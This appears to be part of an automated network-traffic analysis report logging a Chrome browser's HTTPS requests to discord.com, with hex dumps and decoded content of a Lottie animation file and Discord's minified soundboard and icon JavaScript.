                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 72 3a 7b 61 3a 30 2c 6b 3a 30 2c 69 78 3a 31 30 7d 2c 70 3a 7b 61 3a 30 2c 6b 3a 5b 31 39 2e 38 37 35 2c 32 30 2e 31 32 35 2c 30 5d 2c 69 78 3a 32 7d 2c 61 3a 7b 61 3a 30 2c 6b 3a 5b 31 37 2e 32 35 2c 31 37 2e 32 35 2c 30 5d 2c 69 78 3a 31 7d 2c 73 3a 7b 61 3a 30 2c 6b 3a 5b 31 30 38 2e 37 2c 31 30 38 2e 37 2c 31 30 30 5d 2c 69 78 3a 36 7d 7d 2c 61 6f 3a 30 2c 69 70 3a 30 2c 6f 70 3a 39 31 34 2c 73 74 3a 30 2c 62 6d 3a 30 7d 5d 7d 5d 2c 6c 61 79 65 72 73 3a 5b 7b 64 64 64 3a 30 2c 69 6e 64 3a 31 2c 74 79 3a 30 2c 6e 6d 3a 22 70 61 72 74 69 63 6c 65 22 2c 72 65 66 49 64 3a 22 63 6f 6d 70 5f 30 22 2c 73 72 3a 31 2c 6b 73 3a 7b 6f 3a 7b 61 3a 30 2c 6b 3a 31 30 30 2c 69 78 3a 31 31 7d 2c 72 3a 7b 61 3a 30 2c 6b 3a 30 2c 69 78 3a 31 30 7d 2c 70 3a 7b 61 3a 31
                                                                          Data Ascii: r:{a:0,k:0,ix:10},p:{a:0,k:[19.875,20.125,0],ix:2},a:{a:0,k:[17.25,17.25,0],ix:1},s:{a:0,k:[108.7,108.7,100],ix:6}},ao:0,ip:0,op:914,st:0,bm:0}]}],layers:[{ddd:0,ind:1,ty:0,nm:"particle",refId:"comp_0",sr:1,ks:{o:{a:0,k:100,ix:11},r:{a:0,k:0,ix:10},p:{a:1
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 33 5d 2c 79 3a 5b 30 2c 30 2c 30 5d 7d 2c 74 3a 34 33 2c 73 3a 5b 35 39 32 2c 35 39 32 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 31 2c 31 2c 31 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 30 2c 30 2c 30 5d 7d 2c 74 3a 36 31 2c 73 3a 5b 35 39 32 2c 35 39 32 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 36 36 37 2c 2e 36 36 37 2c 2e 36 36 37 5d 2c 79 3a 5b 31 2c 31 2c 31 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 30 2c 30 2c 30 5d 7d 2c 74 3a 36 37 2c 73 3a 5b 35 35 32 2e 33 32 2c 36 32 34 2e 33 32 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 36 36 37 2c 2e 36 36 37 2c 2e 36 36 37 5d 2c 79 3a 5b 31 2c 31 2c 31 5d 7d 2c 6f
                                                                          Data Ascii: 3],y:[0,0,0]},t:43,s:[592,592,100]},{i:{x:[.833,.833,.833],y:[1,1,1]},o:{x:[.167,.167,.167],y:[0,0,0]},t:61,s:[592,592,100]},{i:{x:[.667,.667,.667],y:[1,1,1]},o:{x:[.167,.167,.167],y:[0,0,0]},t:67,s:[552.32,624.32,100]},{i:{x:[.667,.667,.667],y:[1,1,1]},o
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 35 37 2c 73 3a 5b 32 36 2e 36 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 37 39 2c 73 3a 5b 2d 32 30 2e 39 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 38 34 2c 73 3a 5b 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 39 30 2c 73 3a 5b 32 34 2e 31 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a
                                                                          Data Ascii: 167],y:[.167]},t:57,s:[26.6]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:79,s:[-20.9]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:84,s:[0]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:90,s:[24.1]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 36 2e 37 37 32 2c 30 2c 30 5d 2c 74 6f 3a 5b 30 2c 30 2c 30 5d 2c 74 69 3a 5b 2d 31 33 34 2e 38 32 38 2c 2d 31 2e 36 2c 30 5d 7d 2c 7b 69 3a 7b 78 3a 2e 38 33 33 2c 79 3a 2e 38 39 35 7d 2c 6f 3a 7b 78 3a 2e 36 35 37 2c 79 3a 2e 31 39 32 7d 2c 74 3a 31 34 31 2c 73 3a 5b 37 35 36 2e 33 37 32 2c 2d 31 31 35 2e 32 2c 30 5d 2c 74 6f 3a 5b 31 33 34 2e 38 32 38 2c 31 2e 36 2c 30 5d 2c 74 69 3a 5b 30 2c 30 2c 30 5d 7d 2c 7b 74 3a 31 35 31 2c 73 3a 5b 39 33 33 2e 39 37 32 2c 30 2c 30 5d 7d 5d 2c 69 78 3a 32 7d 2c 61 3a 7b 61 3a 30 2c 6b 3a 5b 32 30 2c 34 30 2c 30 5d 2c 69 78 3a 31 7d 2c 73 3a 7b 61 3a 31 2c 6b 3a 5b 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e
                                                                          Data Ascii: 6.772,0,0],to:[0,0,0],ti:[-134.828,-1.6,0]},{i:{x:.833,y:.895},o:{x:.657,y:.192},t:141,s:[756.372,-115.2,0],to:[134.828,1.6,0],ti:[0,0,0]},{t:151,s:[933.972,0,0]}],ix:2},a:{a:0,k:[20,40,0],ix:1},s:{a:1,k:[{i:{x:[.833,.833,.833],y:[.833,.833,.833]},o:{x:[.
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 7d 2c 74 3a 31 31 30 2c 73 3a 5b 34 31 34 2e 30 38 2c 33 30 37 2e 37 36 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 7d 2c 74 3a 31 31 35 2c 73 3a 5b 33 36 30 2e 30 34 2c 34 31 37 2e 32 38 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36
                                                                          Data Ascii: ,.833]},o:{x:[.167,.167,.167],y:[.167,.167,.167]},t:110,s:[414.08,307.76,100]},{i:{x:[.833,.833,.833],y:[.833,.833,.833]},o:{x:[.167,.167,.167],y:[.167,.167,.167]},t:115,s:[360.04,417.28,100]},{i:{x:[.833,.833,.833],y:[.833,.833,.833]},o:{x:[.167,.167,.16
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 34 30 2c 73 3a 5b 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 34 38 2c 73 3a 5b 32 36 2e 36 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 37 30 2c 73 3a 5b 2d 32 30 2e 39 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 5d 7d 2c 74 3a 37 35 2c 73 3a 5b 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 5d
                                                                          Data Ascii: i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:40,s:[0]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:48,s:[26.6]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:70,s:[-20.9]},{i:{x:[.833],y:[.833]},o:{x:[.167],y:[.167]},t:75,s:[0]},{i:{x:[.833],y:[.833]
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 34 2e 38 2c 30 5d 2c 74 6f 3a 5b 31 33 36 2e 34 32 38 2c 31 2e 36 2c 30 5d 2c 74 69 3a 5b 30 2c 30 2c 30 5d 7d 2c 7b 69 3a 7b 78 3a 2e 31 31 31 2c 79 3a 2e 37 38 38 7d 2c 6f 3a 7b 78 3a 2e 31 36 37 2c 79 3a 2e 31 36 37 7d 2c 74 3a 31 32 34 2c 73 3a 5b 35 38 36 2e 37 37 32 2c 30 2c 30 5d 2c 74 6f 3a 5b 30 2c 30 2c 30 5d 2c 74 69 3a 5b 2d 31 33 34 2e 38 32 38 2c 2d 31 2e 36 2c 30 5d 7d 2c 7b 69 3a 7b 78 3a 2e 38 33 33 2c 79 3a 2e 38 39 35 7d 2c 6f 3a 7b 78 3a 2e 36 35 37 2c 79 3a 2e 31 39 32 7d 2c 74 3a 31 33 32 2c 73 3a 5b 37 35 36 2e 33 37 32 2c 2d 31 31 35 2e 32 2c 30 5d 2c 74 6f 3a 5b 31 33 34 2e 38 32 38 2c 31 2e 36 2c 30 5d 2c 74 69 3a 5b 30 2c 30 2c 30 5d 7d 2c 7b 74 3a 31 34 32 2c 73 3a 5b 39 33 33 2e 39 37 32 2c 30 2c 30 5d 7d 5d 2c 69 78 3a 32 7d
                                                                          Data Ascii: 4.8,0],to:[136.428,1.6,0],ti:[0,0,0]},{i:{x:.111,y:.788},o:{x:.167,y:.167},t:124,s:[586.772,0,0],to:[0,0,0],ti:[-134.828,-1.6,0]},{i:{x:.833,y:.895},o:{x:.657,y:.192},t:132,s:[756.372,-115.2,0],to:[134.828,1.6,0],ti:[0,0,0]},{t:142,s:[933.972,0,0]}],ix:2}
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 5d 2c 79 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 7d 2c 74 3a 39 37 2c 73 3a 5b 33 36 37 2e 35 32 2c 34 35 30 2e 30 38 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 7d 2c 74 3a 31 30 31 2c 73 3a 5b 34 31 34 2e 30 38 2c 33 30 37 2e 37 36 2c 31 30 30 5d 7d 2c 7b 69 3a 7b 78 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 2c 79 3a 5b 2e 38 33 33 2c 2e 38 33 33 2c 2e 38 33 33 5d 7d 2c 6f 3a 7b 78 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 2c 79 3a 5b 2e 31 36 37 2c 2e 31 36 37 2c 2e 31 36 37 5d 7d 2c 74 3a 31 30 36 2c
                                                                          Data Ascii: ],y:[.167,.167,.167]},t:97,s:[367.52,450.08,100]},{i:{x:[.833,.833,.833],y:[.833,.833,.833]},o:{x:[.167,.167,.167],y:[.167,.167,.167]},t:101,s:[414.08,307.76,100]},{i:{x:[.833,.833,.833],y:[.833,.833,.833]},o:{x:[.167,.167,.167],y:[.167,.167,.167]},t:106,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          301192.168.2.550037162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC866OUTGET /assets/82082.66eccead8076cc2a44a4.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
                                                                          2023-12-10 16:45:17 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 30 39 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 35 30 38 37 36 36 64 64 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 17094Connection: closeCF-Ray: 8336f51508766dda-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:17 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 32 30 38 32 22 5d 2c 7b 38 39 31 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 74 2e 64 28 6e 2c 7b 41 72 72 6f 77 53 6d 61 6c 6c 4c 65 66 74 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 74 28 22 33 37 39 38 33 22 29 3b 74 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 75 3d 74 28 22 36 36 39 34 39 31 22 29 2c 69 3d 74 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 6f 3d 65 3d 3e 7b 6c 65 74 7b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["82082"],{891722:function(e,n,t){"use strict";t.r(n),t.d(n,{ArrowSmallLeftIcon:function(){return o}});var l=t("37983");t("884691");var u=t("669491"),i=t("75196");let o=e=>{let{
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 77 69 64 74 68 3a 6e 3d 32 34 2c 68 65 69 67 68 74 3a 74 3d 32 34 2c 63 6f 6c 6f 72 3a 6f 3d 75 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 61 3d 22 22 2c 2e 2e 2e 72 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 72 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 6e 2c 68 65 69 67 68 74 3a 74 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69
                                                                          Data Ascii: width:n=24,height:t=24,color:o=u.default.colors.INTERACTIVE_NORMAL,colorClass:a="",...r}=e;return(0,l.jsx)("svg",{...(0,i.default)(r),xmlns:"http://www.w3.org/2000/svg",width:n,height:t,fill:"none",viewBox:"0 0 24 24",children:(0,l.jsx)("path",{fill:"stri
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 74 75 72 6e 20 69 7d 2c 75 73 65 52 65 63 65 6e 74 6c 79 48 65 61 72 64 45 78 70 65 72 69 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 74 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74 20 75 3d 28 30 2c 6c 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 75 73 65 72 22 2c 69 64 3a 22 32 30 32 33 2d 31 31 5f 73 6f 75 6e 64 62 6f 61 72 64 5f 72 65 63 65 6e 74 6c 79 5f 68 65 61 72 64 5f 66 72 65 71 75 65 6e 74 6c 79 5f 70 6c 61 79 65 64 22 2c 6c 61 62 65 6c 3a 22 53 6f 75 6e 64 62 6f 61 72 64 20 52 65 63 65 6e 74 6c 79 20 48 65 61 72 64 20 26 20 46 72 65 71 75 65 6e 74 6c 79 20 50 6c 61 79 65 64 22 2c 64 65 66 61 75 6c 74 43 6f 6e 66 69 67 3a 7b 63 61 6e 53 65 65 52 65 63 65 6e
                                                                          Data Ascii: turn i},useRecentlyHeardExperiment:function(){return o}});var l=t("862205");let u=(0,l.createExperiment)({kind:"user",id:"2023-11_soundboard_recently_heard_frequently_played",label:"Soundboard Recently Heard & Frequently Played",defaultConfig:{canSeeRecen
                                                                          2023-12-10 16:45:17 UTC25INData Raw: 3a 65 3c 3d 34 35 3f 6e 3d 33 30 3a 65 3c 3d 38 30 26 26 28 6e 3d 31 30 29
                                                                          Data Ascii: :e<=45?n=30:e<=80&&(n=10)
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 2c 6e 7d 2c 6c 6f 6f 6b 75 70 4b 65 79 3a 65 3d 3e 5f 2e 64 65 66 61 75 6c 74 2e 67 65 74 53 6f 75 6e 64 42 79 49 64 28 65 29 2c 61 66 74 65 72 43 6f 6d 70 75 74 65 3a 28 29 3d 3e 7b 7d 2c 6e 75 6d 46 72 65 71 75 65 6e 74 6c 79 49 74 65 6d 73 3a 53 2e 4e 55 4d 5f 46 52 45 51 55 45 4e 54 4c 59 5f 55 53 45 44 5f 53 4f 55 4e 44 53 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 41 28 29 7b 76 61 72 20 65 2c 6e 3b 69 66 28 21 49 28 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 73 2e 64 65 66 61 75 6c 74 2e 66 72 65 63 65 6e 63 79 57 69 74 68 6f 75 74 46 65 74 63 68 69 6e 67 4c 61 74 65 73 74 2e 70 6c 61 79 65 64 53 6f 75 6e 64 46 72 65 63 65 6e 63 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 70 6c 61 79 65 64 53 6f
                                                                          Data Ascii: ,n},lookupKey:e=>_.default.getSoundById(e),afterCompute:()=>{},numFrequentlyItems:S.NUM_FREQUENTLY_USED_SOUNDS});function A(){var e,n;if(!I())return;let t=null===(e=s.default.frecencyWithoutFetchingLatest.playedSoundFrecency)||void 0===e?void 0:e.playedSo
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 4f 41 52 44 5f 53 4f 55 4e 44 5f 50 4c 41 59 5f 53 54 41 52 54 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 6c 65 74 7b 73 6f 75 6e 64 49 64 3a 74 2c 75 73 65 72 49 64 3a 6c 7d 3d 65 3b 69 66 28 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 66 2e 72 65 63 65 6e 74 6c 79 48 65 61 72 64 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6c 6f 63 61 74 69 6f 6e 3a 22 73 6f 75 6e 64 62 6f 61 72 64 5f 65 76 65 6e 74 5f 73 74 6f 72 65 22 2c 61 75 74 6f 54 72 61 63 6b 45 78 70 6f 73 75 72 65 3a 21 31 7d 29 2e 63 61 6e 53 65 65 52 65 63 65 6e 74 6c 79 48 65 61 72 64 7d 28 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 74 2e 74 6f 53 74 72 69 6e 67 28 29 2c 69 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 63 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e
                                                                          Data Ascii: OARD_SOUND_PLAY_START:function(e){var n;let{soundId:t,userId:l}=e;if(!function(){return(0,f.recentlyHeardExperiment)({location:"soundboard_event_store",autoTrackExposure:!1}).canSeeRecentlyHeard}())return;let u=t.toString(),i=null===(n=c.default.getCurren
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 34 36 33 32 35 22 29 2c 54 3d 74 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 76 61 72 20 65 3b 6c 65 74 20 6e 3d 61 2e 53 6f 75 6e 64 62 6f 61 72 64 53 65 74 74 69 6e 67 73 2e 67 65 74 53 65 74 74 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 76 6f 6c 75 6d 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 31 30 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 67 75 69 6c 64 5f 69 64 29 3d 3d 6e 75 6c 6c 7c 7c 66 2e 64 65 66 61 75 6c 74 2e 63 61 6e 28 54 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 55 53 45 5f 45 58 54 45 52 4e 41 4c 5f 53 4f 55 4e 44 53 2c 6e 29 7c 7c 65 2e 67 75 69 6c
                                                                          Data Ascii: 46325"),T=t("49111");function L(){var e;let n=a.SoundboardSettings.getSetting();return null!==(e=null==n?void 0:n.volume)&&void 0!==e?e:100}function p(e,n){return(null==n?void 0:n.guild_id)==null||f.default.can(T.Permissions.USE_EXTERNAL_SOUNDS,n)||e.guil
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 2c 6d 2e 70 6c 61 79 53 6f 75 6e 64 4c 6f 63 61 6c 6c 79 29 28 72 2c 61 2c 67 2e 4c 6f 63 61 6c 53 6f 75 6e 64 54 72 69 67 67 65 72 2e 4a 4f 49 4e 45 44 5f 56 4f 49 43 45 5f 43 48 41 4e 4e 45 4c 29 2c 28 30 2c 73 2e 73 65 6e 64 56 6f 69 63 65 43 68 61 6e 6e 65 6c 43 75 73 74 6f 6d 43 61 6c 6c 53 6f 75 6e 64 45 66 66 65 63 74 29 28 72 2c 61 2c 5f 5f 4f 56 45 52 4c 41 59 5f 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 6c 65 74 7b 69 73 53 6f 75 6e 64 62 6f 61 72 64 42 75 74 74 6f 6e 44 69 73 61 62 6c 65 64 3a 6e 3d 21 31 7d 3d 65 2c 74 3d 28 30 2c 6c 2e 64 65 66 61 75 6c 74 29 28 5b 5f 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 5f 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 55 73 65 72 28 29 29 2c 6f 3d 5b 75 2e 44 69 73 6d 69 73 73 69
                                                                          Data Ascii: ,m.playSoundLocally)(r,a,g.LocalSoundTrigger.JOINED_VOICE_CHANNEL),(0,s.sendVoiceChannelCustomCallSoundEffect)(r,a,__OVERLAY__)}}function v(e){let{isSoundboardButtonDisabled:n=!1}=e,t=(0,l.default)([_.default],()=>_.default.getCurrentUser()),o=[u.Dismissi
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 75 6e 64 49 64 3a 6e 2e 73 6f 75 6e 64 49 64 2c 67 75 69 6c 64 49 64 3a 75 3f 55 2e 43 55 53 54 4f 4d 5f 43 41 4c 4c 5f 53 4f 55 4e 44 5f 47 4c 4f 42 41 4c 5f 47 55 49 4c 44 5f 49 44 3a 6e 2e 67 75 69 6c 64 49 64 7d 2c 62 28 7b 67 75 69 6c 64 49 64 3a 65 2c 63 68 61 6e 67 65 54 79 70 65 3a 6f 2c 73 6f 75 6e 64 53 6f 75 72 63 65 3a 69 2c 73 6f 75 6e 64 54 79 70 65 3a 67 2e 41 6e 61 6c 79 74 69 63 73 53 6f 75 6e 64 54 79 70 65 2e 45 4e 54 52 59 2c 6c 6f 63 61 74 69 6f 6e 3a 74 7d 29 7d 2c 72 2e 55 73 65 72 53 65 74 74 69 6e 67 73 44 65 6c 61 79 2e 49 4e 46 52 45 51 55 45 4e 54 5f 55 53 45 52 5f 41 43 54 49 4f 4e 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 6c 65 74 7b 67 75 69 6c 64 49 64 3a 6e 2c 63 68 61 6e 67 65 54 79 70 65 3a 74 2c 73 6f 75 6e 64 54
                                                                          Data Ascii: undId:n.soundId,guildId:u?U.CUSTOM_CALL_SOUND_GLOBAL_GUILD_ID:n.guildId},b({guildId:e,changeType:o,soundSource:i,soundType:g.AnalyticsSoundType.ENTRY,location:t})},r.UserSettingsDelay.INFREQUENT_USER_ACTION)}function b(e){let{guildId:n,changeType:t,soundT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          302192.168.2.550038162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC866OUTGET /assets/26737.36ed5a81390b304d18a5.js HTTP/1.1
                                                                          Host: discord.com
